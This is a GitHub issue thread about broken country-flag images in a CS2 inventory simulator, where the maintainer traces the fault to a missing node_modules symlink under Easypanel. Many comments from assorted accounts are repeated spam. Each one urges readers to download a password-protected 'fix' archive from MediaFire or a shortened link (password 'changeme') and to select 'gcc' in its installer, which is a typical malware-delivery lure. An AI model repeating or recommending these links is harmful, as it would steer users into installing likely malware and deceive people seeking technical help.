### ISSUE TITLE
[BUG] Image of broken country flags

### ISSUE THREAD

**Issue by crashzk** [ianlucas/cs2-inventory-simulator#99]
Recently, the images on the country flags to change the language are broken.

![image](https://github.com/user-attachments/assets/1cd4defd-9ddc-4795-be1e-adcf21f275ff)

Log shows this only:
```
GET / 200 - - 1574.729 ms
GET /app.webmanifest 200 - - 5.319 ms
GET /settings?_data=routes%2Fsettings._index 200 - - 3.906 ms
GET /images/flags/BR.svg 302 - - 4.797 ms
GET / 200 - - 19.221 ms
GET /images/flags/BR.svg 302 - - 8.666 ms
GET /images/flags/JP.svg 302 - - 2.922 ms
GET /images/flags/IT.svg 302 - - 2.553 ms
GET /images/flags/ID.svg 302 - - 7.105 ms
GET /images/flags/HU.svg 302 - - 1.489 ms
GET /images/flags/GR.svg 302 - - 3.113 ms
GET /images/flags/DE.svg 302 - - 2.646 ms
GET /images/flags/FR.svg 302 - - 3.371 ms
GET /images/flags/FI.svg 302 - - 2.773 ms
GET /images/flags/US.svg 302 - - 1.519 ms
GET /images/flags/NL.svg 302 - - 5.279 ms
GET /images/flags/DK.svg 302 - - 2.450 ms
GET /images/flags/CZ.svg 302 - - 1.402 ms
GET /images/flags/BG.svg 302 - - 1.554 ms
GET /images/flags/VN.svg 302 - - 1.550 ms
GET /images/flags/KR.svg 302 - - 1.409 ms
GET /images/flags/AR.svg 302 - - 1.900 ms
GET /images/flags/NO.svg 302 - - 1.397 ms
GET /images/flags/PL.svg 302 - - 1.962 ms
GET /images/flags/PT.svg 302 - - 1.532 ms
GET /images/flags/RO.svg 302 - - 1.360 ms
GET /images/flags/RU.svg 302 - - 1.416 ms
GET /images/flags/CN.svg 302 - - 0.872 ms
GET /images/flags/ES.svg 302 - - 1.445 ms
GET /images/flags/SE.svg 302 - - 1.429 ms
GET /images/flags/TW.svg 302 - - 1.760 ms
GET /images/flags/TH.svg 302 - - 1.425 ms
GET /images/flags/TR.svg 302 - - 2.856 ms
GET /images/flags/UA.svg 302 - - 0.815 ms
GET / 200 - - 31.580 ms
GET / 200 - - 19.209 ms
GET / 200 - - 21.620 ms
GET / 200 - - 14.847 ms
GET / 200 - - 21.098 ms
GET / 200 - - 13.611 ms
GET / 200 - - 16.811 ms
GET / 200 - - 24.824 ms
GET / 200 - - 24.772 ms
GET / 200 - - 20.442 ms
GET / 200 - - 17.477 ms
GET / 200 - - 10.857 ms
GET / 200 - - 14.192 ms
GET / 200 - - 13.819 ms
GET / 200 - - 15.664 ms
GET / 200 - - 22.107 ms
GET / 200 - - 22.547 ms
GET / 200 - - 12.477 ms
GET / 200 - - 15.271 ms
GET / 200 - - 28.096 ms
GET / 200 - - 25.862 ms
GET / 200 - - 19.476 ms
GET / 200 - - 19.359 ms
GET / 200 - - 17.387 ms
GET / 200 - - 18.583 ms
GET / 200 - - 15.238 ms
GET / 200 - - 17.320 ms
GET / 200 - - 40.408 ms
GET / 200 - - 40.578 ms
GET / 200 - - 14.667 ms
GET / 200 - - 12.541 ms
GET / 200 - - 23.486 ms
GET / 200 - - 24.047 ms
GET / 200 - - 11.772 ms
GET / 200 - - 14.369 ms
GET / 200 - - 15.377 ms
GET / 200 - - 18.321 ms
GET / 200 - - 23.066 ms
GET / 200 - - 19.706 ms
GET / 200 - - 15.855 ms
GET / 200 - - 18.398 ms
GET / 200 - - 18.100 ms
GET / 200 - - 19.062 ms
GET / 200 - - 16.985 ms
GET / 200 - - 10.308 ms
GET / 200 - - 16.667 ms
GET / 200 - - 10.904 ms
GET / 200 - - 8.532 ms
GET / 200 - - 19.999 ms
GET / 200 - - 23.460 ms
GET / 200 - - 18.162 ms
GET / 200 - - 14.351 ms
GET / 200 - - 11.666 ms
```
Could it be an error on my hosting's part?

**Comment by ianlucas** [comment]
What is your server OS? Flags are located at `/node_modules/country-flag-icons/3x2`, can you check they are there?

**Comment by crashzk** [comment]
OS: Ubuntu 22.04 with Easypanel.

I found just this path.
![image](https://github.com/user-attachments/assets/68903c62-325f-4044-a1ce-b83ff12d444b)

**Comment by ianlucas** [comment]
`flags` is a symlink to `/node_modules/country-flag-icons/3x2`, make sure that directory exists.

**Comment by crashzk** [comment]
I understand, I'll try to look deeper into this folder.

Just one question, would it be in the same location as the project itself, or would it be in the VPS installation itself, Node in this case. 

Any help is welcome, do a search too to see if I can find anything.

But in the worst case, the folder doesn't exist, strange as in the old versions everything was fine.

**Comment by ianlucas** [comment]
The flags are from a npm module `country-flag-icons`. It should be there if `npm install` was successful. They should be located relative to the root directory of Inventory Simulator, so in your case `/etc/easypanel/projects/zkservidores/cs2-skins/code/node_modules/country-flag-icons/3x2`.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by crashzk** [comment]
Installation, from what I saw, was ok.

![image](https://github.com/user-attachments/assets/d0cbb692-4923-478e-be93-e03613847619)

However, the folder `.../node_modules` and nothing was created after it.

Tudo que tem na pasta `code`:
![image](https://github.com/user-attachments/assets/4478710e-f9eb-4bde-8a0c-c46dd9f9697e)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ianlucas** [comment]
Not sure what Easypanel is doing, but you need to find where `node_modules` is located and update `/public/images/flags` symlink to point to the proper path. OR you can [manually download the flag icons](https://github.com/catamphetamine/country-flag-icons), remove `flags` symlink and upload the flags in `/public/images/flags` directory (you'll need to create it).

**Comment by crashzk** [comment]
Yes, from what I saw here it is something on Easypanel.

I did a build manually in the same directory and everything was created normally, but it was created with a different port, that is, two sites for the same project from what I could see.

Anyway, I'm going to study Easypanel and see the problem with them, I'll get back to you with anything. Everything is fine with the project here, thank you!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
